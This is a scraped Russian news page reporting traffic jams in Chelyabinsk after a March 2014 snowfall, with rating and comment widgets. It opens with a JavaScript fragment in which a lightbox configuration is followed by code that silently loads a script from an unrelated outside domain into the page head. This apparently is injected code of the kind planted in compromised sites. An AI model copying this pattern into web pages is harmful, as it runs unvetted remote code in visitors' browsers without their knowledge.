, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

После снегопада на дорогах Челябинска образовались солидные пробки

Как и предсказывали синоптики, вчера вечером, 19 марта, в Челябинск прошел обильный снегопад. В результате сегодня утром на улицах областной столицы образовались сильные дорожные заторы. По данным сервиса «Пробки Челябинска», уровень загруженности улиц составлял 7 баллов из 10 возможных.

Затруднения в движении наблюдались практически по всему проспекту Ленина, на улицах Худякова и Братьев Кашириных, проспектах Победы и Свердловском. Также автомобилисты стояли в Ленинском районе на развязке под мостами. Отметим, несмотря на пробки, сотрудники ГИБДД не зафиксировали большого количества аварий, в отличие от прошлого снегопада, когда за сутки произошло около 450 ДТП.

В ближайшие дни, по прогнозам синоптиков, обильные осадки в виде мокрого снега продолжатся. В связи с этим объявленное штормовое предупреждение продлено до четверга.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
13:46 - 19 марта 2014
|
автор: U-RSS
|
(372)
|
(0)

Комментарии (0)

Я человек
Я бот